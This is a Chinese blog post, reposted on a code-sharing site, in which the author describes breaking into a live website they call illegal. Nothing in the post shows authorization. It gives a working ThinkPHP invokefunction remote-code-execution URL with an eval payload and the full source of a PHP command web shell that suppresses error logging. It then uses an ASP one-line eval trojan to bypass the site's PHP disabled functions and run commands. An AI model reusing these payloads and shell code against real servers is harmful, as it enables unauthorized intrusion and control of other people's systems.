码迷,mamicode.com
首页 > Web开发 > 详细

asp突破php的安全模式

时间:2019-01-20 00:52:15      阅读:204      评论:0      收藏:0      [点我收藏+]

标签:wan   input   cape   epo   mil   name   info   cut   使用   


title: asp突破php的安全模式


一直惦记着无心师傅之前发的一个不愿getshell的非法网站。终于放寒假了,小菜鸡也想试一试。

首先直接使用工具验证漏洞是否存在:

技术分享图片

工具报出存在漏洞,接下来直接使用工具getshell吧。未能成功。(在几个星期前是可以成功的,可能是该网站的管理员在最近进行了一定的漏洞修复)

技术分享图片

记下来就尝试了各种thinkphp写入shell的方法,发现均未成功,原因可能是管理员禁止了各种命令执行函数并且对文件的写入做了权限限制。最后发现了一位表哥使用了如下方法getshell。并没有新建文件写入shell,而是通过传参直接就使用菜刀连接了。

http://xxxxxx.com/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_POST[‘nihao‘]);

连接成功后,执行命令,未能成功,而是被php的安全模式进行了阻拦。

技术分享图片

通过phpinfo中disable_functions发现禁用了如下函数:

exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close

然后就想从这里下手,看看是否有遗漏禁用的函数,百度了一波,也使用了各种脚本,未能成功。听表哥说可以使用pcntl_exec函数,但是这个函数的使用好像需要开启啥的,总之都试了一遍没有成功,希望有表哥能从这里突破的教教我呀。个人觉得这个脚本还不错,所以分享一下。注明:脚本来自anlfi师傅。

<?php

/*
==============
*/

error_reporting(0);
ini_set(‘max_execution_time‘,0);


// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------
/**************** Defines *********************************/

$user = "anlfi";
$pass = "XXX";
$sm = @ini_get(‘safe_mode‘);
$SEPARATOR = ‘/‘; // Default Directory separator
$os = "N/D";
if(stristr(php_uname(),"Windows"))
{
        $SEPARATOR = ‘\\‘;
        $os = "Windows";
}
else if(stristr(php_uname(),"Linux"))
{
        $os = "Linux";
}


//*************************************************************/

// -------------- Traceback Functions

function sendLoginAlert()
{
    global $ownerEmail;
    global $url;
    $accesedIp = $_SERVER[‘REMOTE_ADDR‘];
    $randomInt = rand(0,1000000);           # to avoid id blocking
    $from = "ani-shell$[email]randomInt@fbi.gov[/email]"; 
    
    //echo $from;
    
    if(function_exists(‘mail‘))
    {
        $subject = "Shell Accessed -- Ani-Shell --";
        $message = "
Hey Owner ,
        
        Your Shell(Ani-Shell) located at $url was accessed by $accesedIp
        
        If its not you :-
        
        1. Please check if the shell is secured.
        2. Change your user name and Password.
        3. Check if lock is 0n!
        and Kick that ****** out!
        
        Thanking You
        
Yours Faithfully
Ani-Shell
        ";
        mail($ownerEmail,$subject,$message,‘From:‘.$from);
    }
}

//---------------------------------------------------------


if(function_exists(‘session_start‘) && $lock == ‘on‘)
{
    session_start();
}
else
{
    // The lock will be set to ‘off‘ if the session_start fuction is disabled i.e if sessions are not supported 
    $lock = ‘off‘;
}

//logout

if(isset($_GET[‘logout‘]) && $lock == ‘on‘)
{
    $_SESSION[‘authenticated‘] = 0;
    session_destroy();
    header("location: ".$_SERVER[‘PHP_SELF‘]);
}

ini_set(‘max_execution_time‘,0);



/***************** Restoring *******************************/


ini_restore("safe_mode");
ini_restore("open_basedir");

if(function_exists(‘ini_set‘))
{
    ini_set(‘error_log‘,NULL);  // No alarming logs
    ini_set(‘log_errors‘,0);    // No logging of errors
}

else
{
    ini_alter(‘error_log‘,NULL);
    ini_alter(‘log_errors‘,0);
}

// ----------------------------------------------------------------------------------------------------------------


?>
<html>
<head>
<title>cmd Shell by:anlfi</title>


<style>
/*
==========================    
    CSS Section
==========================
*/
*{
    padding:0;
    margin:0;
}

.alert
{
    background:red;
    color:white;
    font-weight:bold;
}
td.info
{
    width:0px;
}

.bind 
{
    border: 1px solid #333333;
    margin: 15px auto 0;
    font-size: small;
}

div.end *
{
    font-size:small;
}

div.end 
{
    width:100%;
    background:#222;
}

p.blink
{
    text-decoration: blink;
}

body 
{
    background-color:black;
    color:rgb(35,182,39);
    font-family:Tahoma,Verdana,Arial;
    font-size: small;
}

input.own {
    background-color: Green;
    color: white;
    border : 1px solid #ccc;
}

blockquote.small
{
    font-size: smaller;
    color: silver;
    text-align: center;
}

table.files
{
    border-spacing: 10px;
    font-size: small;
}

h1 {
    padding: 4px;
    padding-bottom: 0px;
    margin-right : 5px;
}
div.logo
{
    border-right: 1px aqua solid;
}
div.header
{
    padding-left: 5px;
    font-size: small;
    text-align: left;
}
div.nav
{
    margin-top:1px;
    height:30px;
    background-color: #ccc;
}
div.nav ul
{
    list-style: none;
    padding: 4px;
}
div.nav li
{
    float: left;
    margin-right: 10px;
    text-align:center;
}
textarea.cmd
{
    border : 1px solid #111;
    background-color : green;
    font-family: Shell;
    color : white;
    margin-top: 10px;
    font-size:small;
}

input.cmd
{
    background-color:black;
    color: white;
    width: 400px;
    border : 1px solid #ccc;

}
td.maintext
{
    font-size: large;
}
#margins
{
    margin-left: 10px;
    margin-top: 10px;
    color:white;
}
table.top
{
    border-bottom: 1px solid aqua;
    width: 100%;
}
#borders
{
    border-top : 1px solid aqua;
    border-left:1px solid aqua;
    border-bottom: 1px solid aqua;
    border-right: 1px solid aqua;
    margin-bottom:0;
}
td.file a , .file a
{
    color : aqua;
    text-decoration:none;
}
a.dir
{
    color:white;
    font-weight:bold;
    text-decoration:none;
}
td.dir a
{
    color : white;
    text-decoration:none;
}
td.download,td.download2
{
    color:green;
}
#spacing
{
    padding:10px;
    margin-left:200px;
}
th.header
{
    background: none repeat scroll 0 0 #191919;
    color: white;
    border-bottom : 1px solid #333333;
}
p.warning
{
    background : red;
    color: white;
}
//

--------------------------------CSS END------------------------------------------------------

*/
</style>
</head>

<body text="rgb(39,245,10)" bgcolor="black">
<?php

if(isset($_POST[‘user‘]) && isset($_POST[‘pass‘]) && $lock == ‘on‘)
{
    if( $_POST[‘user‘] == $user &&
         $_POST[‘pass‘] == $pass )
    {
            $_SESSION[‘authenticated‘] = 1;
            // --------------------- Tracebacks --------------------------------
            if($tracebackFeature == ‘On‘)
            {
                sendLoginAlert();
            }
            // ------------------------------------------------------------------
    }
}

if($lock == ‘off‘)
{?>
    <p class="warning"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></p>
<?php
}

if($lock == ‘on‘ && (!isset($_SESSION[‘authenticated‘]) || $_SESSION[‘authenticated‘]!=1) )
{

?>
<table>
    <tbody>
        <tr>
            <td width="500px">
        <pre>
<font color="Orange">
<b>
[]--------------cmd Shell-----------------
</b>
</pre>
            </td>
            <td>
                <!-- <h1><?php // echo $greeting;?></h1> 
                <img src="Logo_03.png" class="imageForm" /> -->
                <form method="POST" action="<?php echo $_SERVER[‘PHP_SELF‘];?>">
                <input name="user" value="Username"/> <input name="pass" type="" value=""/> <input class="own" type="Submit" value="in!"/>
                </form>
            </td>
        </tr>
    </tbody>
</table>
<?php
}
//---------------------------------- We are authenticated now-------------------------------------
//Launch the shell
else 
{
    //---------------------------------- Fuctions ---------------------------------------------------

    function showDrives()
    {
        global $self;
        foreach(range(‘A‘,‘Z‘) as $drive)
        {
            if(is_dir($drive.‘:\\‘))
            {
                ?>
                <a class="dir" href=‘<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>‘>
                    <?php echo $drive.":\\" ?>
                </a> 
                <?php
            }
        }
    }

    function HumanReadableFilesize($size)
    {
 
        $mod = 1024;
 
        $units = explode(‘ ‘,‘B KB MB GB TB PB‘);
        for ($i = 0; $size > $mod; $i++) 
        {
            $size /= $mod;
        }
 
        return round($size, 2) . ‘ ‘ . $units[$i];
    }

function getClientIp()
{
    echo $_SERVER[‘REMOTE_ADDR‘];
}

function getServerIp()
{
    echo getenv(‘SERVER_ADDR‘);
}
function getSoftwareInfo()
{
    echo php_uname();
}
function diskSpace()
{
    echo HumanReadableFilesize(disk_total_space("/"));
}
function freeSpace()
{
    echo HumanReadableFilesize(disk_free_space("/"));
}
function getSafeMode()
{
        global $sm;
                echo($sm?"ON :( :‘( (Most of the Features will Not Work!)":"OFF");
        
}

function getDisabledFunctions()
{
    if(!ini_get(‘disable_functions‘))
    {
                echo "None";
    }
    else
    {
                        echo @ini_get(‘disable_functions‘);
    }
}

function getFilePermissions($file)
{
    
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = ‘s‘;
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = ‘l‘;
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = ‘-‘;
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = ‘b‘;
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = ‘d‘;
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = ‘c‘;
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = ‘p‘;
} else {
    // Unknown
    $info = ‘u‘;
}

// Owner
$info .= (($perms & 0x0100) ? ‘r‘ : ‘-‘);
$info .= (($perms & 0x0080) ? ‘w‘ : ‘-‘);
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? ‘s‘ : ‘x‘ ) :
            (($perms & 0x0800) ? ‘S‘ : ‘-‘));

// Group
$info .= (($perms & 0x0020) ? ‘r‘ : ‘-‘);
$info .= (($perms & 0x0010) ? ‘w‘ : ‘-‘);
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? ‘s‘ : ‘x‘ ) :
            (($perms & 0x0400) ? ‘S‘ : ‘-‘));

// World
$info .= (($perms & 0x0004) ? ‘r‘ : ‘-‘);
$info .= (($perms & 0x0002) ? ‘w‘ : ‘-‘);
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? ‘t‘ : ‘x‘ ) :
            (($perms & 0x0200) ? ‘T‘ : ‘-‘));

return $info;

}

/***********************************************************/
// exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
// Turned OfF!
/**********************************************************/


function exec_all($command)
{
    
    $output = ‘‘;
    if(function_exists(‘exec‘))
    {   
        exec($command,$output);
        $output = join("\n",$output);
    }
    
    else if(function_exists(‘shell_exec‘))
    {
        $output = shell_exec($command);
    }
    
    else if(function_exists(‘popen‘))
    {
        $handle = popen($command , "r"); // Open the command pipe for reading
        if(is_resource($handle))
        {
            if(function_exists(‘fread‘) && function_exists(‘feof‘))
            {
                while(!feof($handle))
                {
                    $output .= fread($handle, 512);
                }
            }
            else if(function_exists(‘fgets‘) && function_exists(‘feof‘))
            {
                while(!feof($handle))
                {
                    $output .= fgets($handle,512);
                }
            }
        }
        pclose($handle);
    }
    
    
    else if(function_exists(‘system‘))
    {
        ob_start(); //start output buffering
        system($command);
        $output = ob_get_contents();    // Get the ouput 
        ob_end_clean();                 // Stop output buffering
    }
    
    else if(function_exists(‘passthru‘))
    {
        ob_start(); //start output buffering
        passthru($command);
        $output = ob_get_contents();    // Get the ouput 
        ob_end_clean();                 // Stop output buffering            
    }
    
    else if(function_exists(‘proc_open‘))
    {
        $descriptorspec = array(
                1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
                );
        $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array ‘pipes‘
        if(is_resource($handle))
        {
            if(function_exists(‘fread‘) && function_exists(‘feof‘))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fread($pipes[1], 512);
                }
            }
            else if(function_exists(‘fgets‘) && function_exists(‘feof‘))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fgets($pipes[1],512);
                }
            }
        }
        pclose($handle);
    }
    else
    {
        $output = "They have their Security there! :( ";
    }
    
    return(htmlspecialchars($output));
    
}
function magicQuote($text)
{
    if (!get_magic_quotes_gpc())
    {
        return $text;
    }
    return stripslashes($text);
}
//------------------------------------------------------------------------------------------------


?>
</div>
<div class="nav">
<ul>
    <li><a href="<?php echo $self.‘?shell‘;?>">Shell</a></li>
    <?php if($lock == ‘on‘)
    {
    ?>
        <li><a href="<?php echo $self.‘?logout‘?>">I m Out!</a></li>
    <?php
    }
    ?>
</ul>
</div>
/////////by:Anlfi//////////
<?php
//-------------------------------- Check what he wants -------------------------------------------

// Shell

if(isset($_GET[‘shell‘]))
{
    if(!isset($_GET[‘cmd‘]) || $_GET[‘cmd‘] == ‘‘)
    {
        $result = "";    
    }
    else
    {
        $result=exec_all($_GET[‘cmd‘]);
    }
    ?>
    <textarea class="cmd" cols="100" rows="20"><?php echo $result;?></textarea><br /><br />
    <form action="<?php echo $self;?>" method="GET">
    <!-- For Shell -->
    <input name="shell" type="hidden" />
    <!-- For CMD -->
    <input name="cmd" class="cmd" />
    <input name="submit" value="Run!" class="own" type="submit" />
    </form>
    <?php
    }
}


?>

上传该脚本尝试了一下,没有成功,依旧被安全模式阻拦了。

技术分享图片

最后,既然是php的命令执行函数被禁用了,也是php的安全模式,那么asp的命令执行函数是否可以成功执行呢?立刻上传了一个asp的一句话木马。

<%eval request ("nihao")%>

成功getshell,并执行命令。

技术分享图片

哭唧唧,寒假要加快学习的步伐呀。

asp突破php的安全模式

标签:wan   input   cape   epo   mil   name   info   cut   使用   

原文地址:https://www.cnblogs.com/v01cano/p/10293838.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!